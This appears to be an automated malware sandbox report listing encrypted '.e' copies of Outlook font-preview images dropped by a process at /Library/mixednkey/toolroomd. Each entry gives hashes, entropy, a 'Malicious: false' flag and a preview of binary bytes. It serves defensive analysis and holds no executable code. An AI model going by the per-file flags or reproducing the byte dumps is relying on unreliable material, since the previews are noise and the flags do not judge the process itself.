Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.a.Y.y.uCg...y6sT<"uP.....w.2N...rm.U_[,..v...Y......&.8...................Z/.....Y".....@.E.....L..`...~....%..<....qP.#.........@..Q.:H..JeY....u...`..^..IK..;..H...v5.s..._.....J/j...O.....~../yPbG..E.4.W!#wC..+z.......\|.R.x....3......O..p.....;.xH.HJ~......{E..HY...qfw..=...Y.,.G...z=..........U...U...6...&....C=....irUS...B.. ..B.`j.......nc...#.[(C>....G.}S..<......6....&....@"9.Fg.:..c..WH.U.....T.8&{Vz....U..@.....k.w..f ......x....y.=.7=I.T..:...D:./..5......).-...t.)`Z..J.......\l..DI.........Z[.;Y...lY.........>.]...n.../E.v7.2c..p......[Hg.e.F......./...H..U.f.:..1.d.n.bd......8 ...f.z10.M...!..Qb....7@....m...`.;/..#...T.._.e.~162.".Osn.B...(.6......(..~n.....5...u.i.I.m)...#l....;[.J..X....c...}..4.x&.L.........)(....m....`..0..]Z.OJ;eB.w.+W.Q8..s...j..p..hz.w........m2......$........Y........-.2......QG.o[Nt...._.&c..m.(.......\|.]x.R.b.7........{..v...$.@....uO..T...]C....@.^'m.`..o

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STSongRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1210
Entropy (8bit):	7.354556461707552
Encrypted:	false
SSDEEP:	24:EkEI18PcAiX2U7ANsx7T3j7uBfjEK9ntXp9OsePc0m7:E3IaPcABmMs9TXuxjEuYNpq
MD5:	AC12343979E77ECC8D141CCF7ED9880D
SHA1:	C95BC6E93205B5AC4A125A70637FADBF9485EE68
SHA-256:	BF00959E124DE7EE334415454D525E251FEE58AC1DD0A15C17ECFDC79830C376
SHA-512:	D52F90610175DCE4C7871DA61410532B1F1BCFA77C518D1EE2DDA633EC54B4EDDCF71ACBF8875310844BBC3073009CC8443DBE043F15309C8D74038ECC1E8C69
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.af..#......0\ ....n...?.W.%......Sw.\..H#c.Aa.......E._....y:.&.&J.....l.7.$A2.cT.g....(_....<'o$$.H.....\.e8....$&...'....v...>.C^..,.z.....L(....PC..D..7}p..n.R..nh..X...x....oc).gs.\|~)T.+.A. .......+'v.....(.U'..R.).$.e.........h.B.)....-.S...n.r..5..,.?...-....P..Q..........b..Zl...N.b.C....F.q.{...R..z..V..7......e..#%.......H..E9s....!,..\|..Orn....9xH....e.....P.0V.6\|F....:N....Ao5~..._..,..@2.S......bpf.=.Y..@...?x..p$....f...,........,0...5.k.`......x..]..(.F..}.A..=_.^.p.....R.%...?.~.Fo......E.."....<....w.....Cf..T"..J..28.6\|.C..ry...c.p.v...Y:....T...,..>h..E+%.~....^.....76K..0.......i7NS.to.@Yn....B...kW.K....E.)....X...>..>.Bo.8$.!.1t...E}<..c.X..qF....#.......u.'r..D.8.:..&.A.e$.]...bi.8F...a..n......@q.._7.s.D.)9T.A.J.=.z..T..<..6>.(...r.=..n.h.$.H.....c..2..71s.@.cAvg...X..D.d........................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.SanaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	994
Entropy (8bit):	7.1064683452273965
Encrypted:	false
SSDEEP:	12:WvyOH0m+lociYVwwGODoF2KwqY+maV8hx+gsOzc07+NewgUP9beTcPvUlmsewLYU:E/+lFiQwwBDoFlKhzz3khPs8FsePc0m7
MD5:	9313EEB1FBD9ED67E209CBF837311E67
SHA1:	4F4C50142EB84ECFBD59858815F670D5FA5470D6
SHA-256:	9D424E3174DC7631B641753E8093D1130137BECAB1A63E5CF7CDACD23EE67B18
SHA-512:	B603FD12B70C7F5B92B2356FBBCF8D97FA3D2344AAD3AF51A376DEFFE6263F85C18DC79E1139AF973C986C5210810D46B46F68178345977A31EA235EBD88205A
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a\|.........6.O...ZE.z...r....}.q...-#..+..).s....uG..... .......s. ...:.(...j."....[o$1T}....~.^Q.$"s..}m........'~.6$.....!.&vJqOC.G..Z...OS..P....)..g,<..\|.<&...s....7.V..>........qf>Z.........n.6Y..N .~!....~....F.B!1...-B.........:..z.f..v....#5...D..4Ug?W.f.XQx(.Ut....NC..yE....Q.....12...m&.....Y./9..1$..{k.Yl.9....=.x..6W..i\|....T\|.....:.T+s..u.......}Z.L.YYsd.....r..7.b.Q.....".DD'F'.......V.Z.;ad-.....Z..7L....o.wW.up.F...1.}}..k.`R..........).....i}..DK..9[.O-..".}...o..._..ir.....1.}....<.+.D.3.;....a..^....$....G.m.... 6.;.Gx..ez.>.`...@...TF...pV...IW11PF<./.R...GIv......J.\-...\|......................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.SathuRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1106
Entropy (8bit):	7.276962478141317
Encrypted:	false
SSDEEP:	24:EccEkhIRsqcRwnuWyWf3XsXQafBtg60WsePc0m7:E8xByS8/g6vNpq
MD5:	924492E21774A8F792A7E12F3E85BE5D
SHA1:	43A42C57DC61499299921F86F2874DE14B5CCB37
SHA-256:	2420C2893DBE3CEFB250FE343C0916EB59DDE5A9DF9ED6DF1ABD07232D785BFD
SHA-512:	86D9439153E80D9E280757347911A193D4F4971BD54C5962724D90BCADBC4F67B22898C4F12D6FE26EEB12DE3157DD3306518711A5E48CEF7B589FC3461A30D4
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..G"..i.Q.rT].?9..I.7.#d..jr..bl..lcb(L.....~..[?@.._....?.........87.qg....9.\|......g.B..lb.........Z...R.n.C8D....N....{d.,.&l..sil...BO.H...k>.v,L."....].i....fs ..}.s........r.d"..-....d>!6...<...'C....}.i.1.O.c9FE...O.d......'"$z...C..m..=`X.#.~.b..A~..k.C..D...e.Zr.Y.K.}......... .=.Z.lV]t...1F..;.\|.-.FC.....4..C.z..W......N{.}B.t[.,..e8.#4..1...6.....A...e._.....u5.i..Q......G ./.UrgJ5W.3..l.<5.........H.X..\.n...!Od........N.M...."..]...........7...3R.<..x M....7P.....%...x:.(D.r..r...M..\|..g..M{..H.(WX...)\|g.K.>....6..#..E.Q.i......._$..Ak...n.......>.L1......._...S..~2..X.a?(.x.....(..IsF.ZHx.j..C..5.x.X..6...[....JJPg..':W.t/./H.m.j.=..T:.4.B.b.K}.&.^r.5z(............4.M...q...".!.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Savoye LETRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1322
Entropy (8bit):	7.4061132478496505
Encrypted:	false
SSDEEP:	24:Eg10M2K+MLUa9JOgp/p6Qk7E4WHIdVFEuP5HgsePc0m7:EgfJ+MLB0gD6Q4EoPgNpq
MD5:	ACE6B28F94A0CA2012D564C21C7D49CD
SHA1:	A806E5480AD842B80592EED4A78E4B44FC7C9AA9
SHA-256:	1694EF3775E9C0C7314EA46AD4F81E7A7CA660D4F2AB2F45D24AE7710A0C96D4
SHA-512:	A4587AE6CA9A1A6AD82177A3D07234203C397C8A7C35CB09FE455099B8282CD70AF8C1CEFC8FF4F91D8CC306DCBD1D0C188CD8F334CFB1081F0ED2CC6E8FE9B7
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.......F?q!.p....8js}.L.....O.Fe.<.p+.PQ...!.}.k.......i....]h]5.?(n\$..k\J.........T...........P..T#....Z....d.q.m..}$...m.U..\.:<>x& ybLq....{.s.R...:.Nq....\h....c.5.......@K.'...u..J.8......[....a..=H..\&Lp.].......J....:....Y{.^.@.@...l/.......R.b.....h..\|.i.......U..m.g 4.;..7...o......&...ja..^#....m\|......N.LB.`..`...Q"..$N..........`.../.&.M.20.MUo..hh..DUi`l.....0..F.k..&1S.U....o.D..L...f"..4qUsW......_....+..$,-..2Z..B.@.o.0n.n...`.w..\|-.O'.9..._..I&'.h.....5...d...>........J.=...._.q........M.......V...;..R.lvM...<...........4R._'......;.K&y... ....<.u..?.9.0i."8.?..).1../..K.0....A.f...t.,3...B.n.#a...e.!;..@..AA?.X..,(m!T4]g)1....wA^!....F0w....5..2e..}.l.V.Sm.z.Z......O....g.J...........`Q.t.5./...b.o.....t.....ee...qD@.z.b..ak0...W..}........8..b....i.a8.r7nE.A..R(.B.F..8....uAN..o2.....'....6 ~)..a.h&.~....8.$.>M)..gs....(..8....S..*&...>.sR.L3....(..........I..v.^.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Segoe UI HistoricRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1882
Entropy (8bit):	7.630295701388876
Encrypted:	false
SSDEEP:	48:E7/3vMnKJ4sqBPXZYovNw6wpRZN+5i8uqamOGj3t3Npq:eMKJxsJYD6wpc5prOSt3u
MD5:	442871DC749E4FBBB9549E43B0D3CC9D
SHA1:	B6AD034F2B98DBC99985C80198B2E9E45652D03F
SHA-256:	B619131E8447B12E3605E979DD39DB2BC07A0822293C06654FDC32362A0C01C6
SHA-512:	8C11520370D25DDBC67B8D543C7E2C3AC15D12721868F38A64296C2F352956691D7BDF28181A2E6A87BA5C50ADEC14E8AB47EE0AEFEE16DFF1EF07CD201DE796
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a9......;..........@.$R.p..'..../...?E7...]x....K......\|QL..."@\...;..:....=...=O...>.A.c.+...h..y..{\|..!..4w...2...S.^.2...S.^.2...S.^..&.X.....vp.=..H.....fl.....).6.)7.]9S.).....1..{!.......X...#}.!.....]s....6..>......q\.]<........;.B.zc...3+.N.<...s.....z-..J...`...e.....}...r.HP...e....og.....};...M.....C.w..;...;....C...f:NuU..{.{.F.~s....f..a...].0.u.g..\|.`S......K.9.U.l'.Eo...Q5.f.q]....8.3C.i...nV+`....XI.....4.....4.:.L..f.Ap.....'.u..>......"..r.1l.^Q..,..a...B........9H.b.cg..@.ys.#k.d..t(..t.P.h...s.c.7....*.P..Y..Hs)...7.c...7.%......Oe.-..H..[..V:....zs.z....R..}.2X...]&..b..._..8....B.'.q..Ae..'.2..il..L#.x6I..rs.lA......co.+.6...F.5....j.)Dr...f.....7....(.5...z.R..s.F.U.u.{j...?.K.S..Z!..&E...!..?.....X.P...V.../:A...9..c...q4..L.>..F.=....On..>..@..8...x.l......W..kS...SK..J/y.........0..f<5.\|...[....e...`K..@...0.. ...>'..Z6..rtc X...~...s+lu...i...&?....!..q....(...T..E..".

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Segoe UI SymbolRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1946
Entropy (8bit):	7.6596036331722
Encrypted:	false
SSDEEP:	48:EO6wboQ8ntmIuwMYVuu6dHTE0WHGI1RACgD4MNpq:Aw4tmRwStTE0WHGI1wu
MD5:	08CD16428C8F9327AABB3F5249872C08
SHA1:	47DC18EB8CA14AC70CA2E4973B618666412A3DF2
SHA-256:	87092F131AB45337B955A6DC72B3EBD73E4BD0B822C769EE3603DD11CF26FBB0
SHA-512:	DEDF6C08EC5C56A2235833C57929692B5C3C0BEED563BE5E1324CF2218D357744B556D5A6F12F29867B23AC624E1EF32084A80E3B64C5301039FCC526044BC7A
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a8q.5..O'.\GW....>Y.....d.......%_CT..c...]..%.A..@..V/.._n...H..H.../t./4d...Q..i...@...$........G%S2.o]i,.\|.$o]i,.\|.$o]i,.\|.$.. d........P......K.rG.L....b................~9....\../.~..1...x..aY.16...Wa.(%y.z...@..p\4..).....5.^NL.X...$.<8.Xs(...4.\..;.a$q.....R,[(..g2.....].7.m?.`.<....Qh.>..,if..7.o.1?.)L .w..e...E.....m.q..N.R.o.......qF\|.H...~H...h..?...!...-..8.R`.g....G....c.........Kw....x.R.3J4.e<i.`.:..p.......i..d\|..3.BA....*xI!Z..&.OPQ..9......?..A..J...x>G........ADg.s.B;.CW..H..b.k.]j...C.p.;.A.B.").$..:6L...;i%=K.8.n.].ja,.W:..T..vQZ&...7..3..WQ!....1.[L../i.c..3.-'...+.#`cR....,!S.Y.TC.N.,.....-......:..)...o.tq8.b...6.^M.4..\.......+~.W...z.......d.:zY.W..J5\|.]...(.e4.=....?topR.T5.vp.C.......W)..p.. .....:.J?..P..n.q...kK.X...t2Y@w.{.M.+j....4.!_w.......\|.e.D..a..8.s.Z:..O........x.+..~=b.uP.t..~....B.[..9#.J..k..W...t..e.g..L.G..2.]:.x....Q....".(......3..8A)g..Y..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.SeravekRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1266
Entropy (8bit):	7.3880338343548795
Encrypted:	false
SSDEEP:	24:EP99G8OGlEW3eh8nDmTOcRGrydfje3TXvi742ItMVbQ1vhsePc0m7:EPBn39nDm7YydfjeTXviHDohNpq
MD5:	8D3C5462244B8A36A45DD5F14DA96CEF
SHA1:	EB5A50AD32FEA1829DCF2A8F7E467026A0C77C8D
SHA-256:	C1FBD6942B795709F820C87D4A20CE37738D2DEBB08BED4E62EBD6C06073DC06
SHA-512:	5E45F89805754026EC0CC01C92E3D0CE8729FF5FAEAF1E0F86D0B301EBDCF52863B24461A7B4E88EB35C7D40534CA570C8AF8FE250616FBEE98317A1AC6AB78C
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aon5>.a...6.."vX.E......V.R...n>.H.......X...q.......6.......$....\|..(..cHf[..+.3a.......i.6\|.8.Q'\|aU...6.\.l.2....F.l_........508.? ..K'.'.X. .]i...'A`eq..`.W.u...Tq....!.....,_o..S.t....`.O.IDh....o./..v$.~..6i..q.?]..v.....>.Q.....N....1..3.......G..kG..z..y!.\G...H...\./j.E....,.pL...............~...VT.%T.........G...U.J....e).[0...jR..%.z.u.`.....mN$ ..d.....x..j.v.B~'/.a.C.<..A$....:...,,J...b......5`5.J\^^.._.O`..F.t...A..<(k@.^b.{..XF.w.=.G.'...d3.&.4%..)Tk"..\[..}k.Z......6.(..g...?..6.a.j?..tk.>.......N...![.....wO.... ..?.xP.O.U,.@.....MD[.}.}..0..{6..{..D....~.u.;.._F.pk.<..-..?.Z-.....47....={".%..0L}e..._v.w;DD.6:z.....c...\.u.(..]?rp..R5.:..... ....01.\xa.........pfF.,.6.Vv.....]..o&.li..q\..}@.z.p..'..G...t..L>f....F0...N...}w...L.?.DJ"...>..\|?b!....^[d)...5..kU......?=Es...P..l..9.=.W.0MC[..Hi....[F~...us....$.8TKs.c..a$......S..._.I.'.s....................\.........^./k..`R..V

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Shree Devanagari 714Regular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1930
Entropy (8bit):	7.65754806218827
Encrypted:	false
SSDEEP:	24:9AFA9oaAVh1LHmNNHcP+eW04i8Q8vDeIP/OvHmIOWTgP1VAsal7C/HVSsePc0m7:9n6VhNHYN8jj9xql9VBalycNpq
MD5:	287FC0F1D4CEAAA4EEC028181F0C7BB8
SHA1:	31F0A306AB65F8D48A904C5651BD72DE7BCEC1A7
SHA-256:	089322D822F2F2718711AB0DFDF9967EBCE9B6DB6E7FA630554B057803FB614E
SHA-512:	6BA8A262EC13EA14AB77BA2807F350CE6C5F194EB80F6E3220DCC7B355A6944273055CB675AE3E3E6AD8D481025ABDE9C839939026979A390F7236FCB00AAF5A
Malicious:	false
Preview:	.<.\|.....f.A..}.r<.9.%...D.fu.;..bcZ..i .Y.a/T.o....)......d...q...O.``.h..L...AFaN.8D.....m...=nDrX{.\|..j.JKeC..J....../l.2?.F..E..H.......}).t.<.....?..Tu.3C...Tu.3C...=............:.W.{m.!..T.7@....1._.p...F.n...oc7....-,.....g.7..'.9....tM....2@5......?/.r..d?.J.....f...........-...s.p..N.$.h./.]..JE...s..L...B,.J..."..}.......5.L...,4rh......sO..X...b.Y.:.a..1..).._.P.Z6...{..b.i<..p...W.~R.w./&.VO4......1...E....,.<.I[NW.v.b.x...3~Ee...#.?......\|.E.@.."i.c.......I.p\|.<......4@..E.....p.F]a.9&Yy.4rAw.AL...E.K....c..vy.n.....u....u.mxv....?". 2........[c..7hC...F...}....O.B...0(....T...MRN[T.L..?:.d.c...%&&.<.N[)G...q.~....o...4_.j./K.I6..\|...cA...Qb%U.<<..=.\....CH%......(?..&..x9....Ez..D.t.).8.Q'1...y.^s..6.......8...k............:`R.%.M.....h....y.........p..!..tS...2;.n.Qi..y.x...!...CX.V...R*.0.....cWG....-.....(...{[j.....u.4.4....W.Nq..LK..Y..l1.;...P..7.9..ehK$..f...../.E...[./......X..[....T.@+..x .....{k?.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.SignPainterRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1386
Entropy (8bit):	7.453400655868875
Encrypted:	false
SSDEEP:	24:ENYvZyBD1BIUZsk1yDTWjim8vWAjJ0H382RQOcjsz0uAUVsePc0m7:E8C8nksWji3WA9M382RugDVNpq
MD5:	852D0B4DF3888E78CBDB659F7C04F105
SHA1:	187F67190902E8B3B8242830CEF12EA1082DF6D0
SHA-256:	B096CA7D92BB6956740C79AD00AA9633046D315379CA308E69DF59863DBFC4B5
SHA-512:	E8FFCBD1521E1D215A2E4AFF353B88815A1D73A16F110735B5A56ABA485DE36F2218DB3A1492EB2799021CA8F815F1618B88F53570ACD981C8E339172DA895E6
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a....mOJ[..Y..x...D....p./...'.n.(!...........t....FL..3.7c~....K......cw[D~c.. \|...j.d#.......4.&>.9......&/....q...>..-..'.)..@2.Df....c..OU.$6..4o..lo;=.".......$.\..9X..).f.J..7.!..L}[......J..).....#.}.."......9.9...s...~[Q..a..s..K.vu..V...l....?z.S..r.8.q.6...n.Q..k..p..y....[.Seb.2.].\..W.2!.U.E....T.PD.c...I.JCvd..?......@........0?P>.....8.E....@..a.........J`...D .@.X...3.1.......De..t..].Z)94.+=...Q....X8..5.....@....\]i..(.m..F.Y....2..<\O.n......5._.4...P.-3..#.......K+.XA...9....xs...f..p.L+.$......y].T.....rt..&a..3.w).L.?7..oE..\K5...]..\.Tq..-....[Jo..07."Q]eS.6........=.W\|RO^....v8...k...}`.nVTR[......hp.8#..{...Pe..r..j.].{(=.>.\.%8....U.6U.....6..h....e.v.,..)........N..G}.P:h.@E..K:=L........4X..H.&.(B{.........5`m.....V.Y 6..C..a.......6\.f.iWps...O^.u.>n..M~........h..ltVA..<......~..3...+...J..L...V...Q2.wM.t-.ub..[8.s......Z....l..]..Q..fTL.e.....\}...^

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.SilomRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	7.061037376229293
Encrypted:	false
SSDEEP:	24:EahpN3f7nNiMGWRBSGgfo7NrG5dsePc0m7:EG3f7gM6GgflXNpq
MD5:	973DDD79901D134AE92BFC054F630A9C
SHA1:	8425A8496D32F67DCD8B23E2B933FD8C3D7AE5C2
SHA-256:	C37834F7F6433A77640EDAC610DE868848B705BFB951B90905D36A5CE48190B8
SHA-512:	7B9437DE02D5299AABF0D221E8F9D4D360532DD470C096AA67B7724953693CCCDD3E6EAAA2886052D0B47EE04BBC682FA3F7E51266C26050C92D8782B191636D
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.ah..k.a.e...rV.[&.De(.D0M.Jz..y..?7......,..m..C....\|.n..p..{gn.iB.....c}...}.)..rn7.....l.F.C..z..@i.....d.S.......Fh0J.VTR....U...AE..j...d......p...o.;.yx.7.5kt\....k..6..s.`J.G.Fs.....I..+.I.Ig...c.N..U.e..\|Je....A.v8...K..Q...........z..H...$...Yr.;...co[........h.).!I..}...".:u.{0....i."..y .'".g...'....P..p......{.k@M/...}.0k.;.&....Q~..7.W..4SX......... ..?..B.".zTp^..s...K...S.7...\|..U....S.?..#v./.\.{8v.L_.}i..4Z..j...&.%rp.6IF.C0.....I q..N.%....U.!..x..X....... ..S.-.#...yY....3..OG..s..N[.Yb..........$.p..}..\.a.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.SimHeiRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1074
Entropy (8bit):	7.258170072244092
Encrypted:	false
SSDEEP:	24:E3nSFVG+r8v+orCCeO2WNwpg2W/VYsePc0m7:E3ai+orCfO2QYWtYNpq
MD5:	F6B1F2DCA70099299BA8FE97375B6154
SHA1:	D75B86D13286CB1305413563651995E73C817791
SHA-256:	18891B2EAFED27CC77D1844C975499A9A16A2F8B722C0548D50D756FEF9CC45D
SHA-512:	3D6B5F9395B2FC4A96B2F010D4F99EFEC2D537676C4A2A40889AF5812C52DE9F2BC0DBF37321E619D31A3081DAE2D599D4F7D88EEAADEA35C07D5BF45B2BE9FE
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a......'.....8..J7..":.......>..Jj}.#@^..Y.n.(..hU....h`f.m`..k[d.C...=AYKB...9l.....l..E.-,...x1...H%0A.G.6 ....Rp.u>/.h.`.jW?..M90x.........S...W...H..."....1.(..C?.=......6.(...k.....^. .l/.QE.w.&.l)...l...{:....u.,y...p...9..>.u...)....!..,.;e?.".b..2,.B..l>.E.V.k.........y(L...[.M.Z.SY.!.f..-.3BV..!6...5~........j?F.G..........eX.SlI....s...)T..Pf....j..<.....6.yCR.<..Hc.N...1y!v.......o....N.....3/..m....B\.\|.).Z....9).ZY...}.I..V.@.+u.._...h..f........dd./sX.....jH.....DS..G.6..Q{.......&..;......-...O:.75[....`..#. .%.... .....0..t....w.-..d.......!...e....F..,.F.Y<9E..e.P..a....i.....-.x.....o...[...NZc...}"6n........H%0A.G.6 ....Rp.u>/.h.`.r8..8A....%.4....U..u..:PQ......................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.SimSunRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.267798244642404
Encrypted:	false
SSDEEP:	24:EiTSnl2vywvJ2eMnoAuWIvYCWVu6A6gN8sBYoyM2lYsePc0m7:Edl2vyYFAuRAd1s8sBYof3Npq
MD5:	4F480B00EB00BAF40A2FB69A851D1783
SHA1:	1642E520D2EE653E341421A6D15F386BCCADA268
SHA-256:	EDD3096B4E7202584C614DED40EA91E86581AE47ED9142B5FFB9E4C4CC6A1E31
SHA-512:	D4F93E32F7346C884B8B3C17519E6533EDDAE42C842195CB56EAF1BE0C9C012FF19E4E14B1358F1132FED72230DCB6DDE7D3263B1EB12C5D5EAA754F2A17BBAF
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..Z..=..Q...I...........(.t.[.....U....O......=..W.....,7:.......P.(^....M..6.....7...<...o....I..\|.+g.?%o.?LY....5np=....!.\|.6..<.M..E..<....Yb__N..cA.h.KJ..>.........".8>......^..3.l..H.}4........_<T.....?UcC..j.....YH..Y..x..)l~'..f."8l@.t~.t...3K7......u.#..p3....Q..........}......W..........5s.&..p..E..S.@_-..-mi...x.5.]fu`.E\......./....w...+.J.Wy.hW....6..-.=.....;..j.L"...v..`.n.{y..K=..B.}.......!.`...8Q5Z.`........%....:...8q."..z.y,Ji..f^)..F....}.eG$..N...0....J.....C.Y.;......M}...~0L...s.\[.......^f.0..e.y..M+........0@u,].L[.._rMm.h..k.p.>..{..<....$)[.......@T.c.Rx..o......iN..Bh._U...........r....,.l.).{T..bM.(q...^ ..d...B.J...lF....,...r[>....J0n5#.Ly.S....U..u..z........................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Sinhala MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1058
Entropy (8bit):	7.2358335497902475
Encrypted:	false
SSDEEP:	24:ESJdfRhC+nr036/VrmgRYUm18dVTr0oPkjyUVZsePc0m7:EUlr9rmWm18EZ3Npq
MD5:	E953FFDF903519A39517A820A37CE703
SHA1:	C99C20B094B0D1E70A9299108FA2ACFA6345851A
SHA-256:	7723B97CDF596E42F14D6B9773D659D9430B046559278546D14D4171E215C261
SHA-512:	871CDCFE25856501835298295AA920D61DB794959B2B01DF75B5FF46BA5301C6C106074F615B015FE8994F62663D00578D334B8D71C7717F0E3FC2D0B5273F57
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...H....B..\|....}U07...\|.....u.~$u.Bc^#..E..1V.......x....k......t...5]ia......Z.f..f......A......J.;7...k.....U......J.;7...0.VcA.2......X..H.....i......)vH....~....~=...o..6r#...4.h..m...b..h.?L.U.[V.[R.qNg</\4..-nu..QPR.FZ....)A...[..gO........@..?..itD.}......~.......W;..p)GS.#.'.Ck#J..s....jo..G{.... ...n..ov...1._.N.L..y,..+.~}r^.LSM.B..]&.![`.Z_os4..R...#g..4.dB4..$i.$p..=DU...><t.0.p.: ..<..7?X..LU.E.....v!...ndr.....4....3.>C.R.UQ.t....d.W..C.............(..@o......=.a]..hH...^........$6.#....4.r..:..tJ.!%..#WGK.3.#."(Z..%bq...A..Y.-B....5Z....U.J.$.TMb.P.Hp]w....u.]o.+..>......g..e...4<d....b...q..,...r[>K .H}wg.?......q..Q...`N....U..u.eL.$(.....................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Sinhala Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1554
Entropy (8bit):	7.502410285985392
Encrypted:	false
SSDEEP:	24:9AE0bnDRYLocfq/3eDTwqqdhyRPa2CjRupIJoFX3Pk3TDKjUaPesePc0m7:9cTtJcyWrmhqPaHjRrit3Pk3TupPeNpq
MD5:	F4C4180675030682591B16DB1160D948
SHA1:	DBFBE22652B8AD388D7BB9CA9C9491666E0A8AC6
SHA-256:	0E2ED8C22596DC3784686BB5BB9AF6168A968217CAC46ADA27ADD8B2F160CBD6
SHA-512:	B0036A1129701A5960A08D43820C3DC4283D9ECA26035D87A3026408A00959CD86D569DC2654E1B2F4580CAE9688495B5360ED9F75E2A140A1F3030104113F80
Malicious:	false
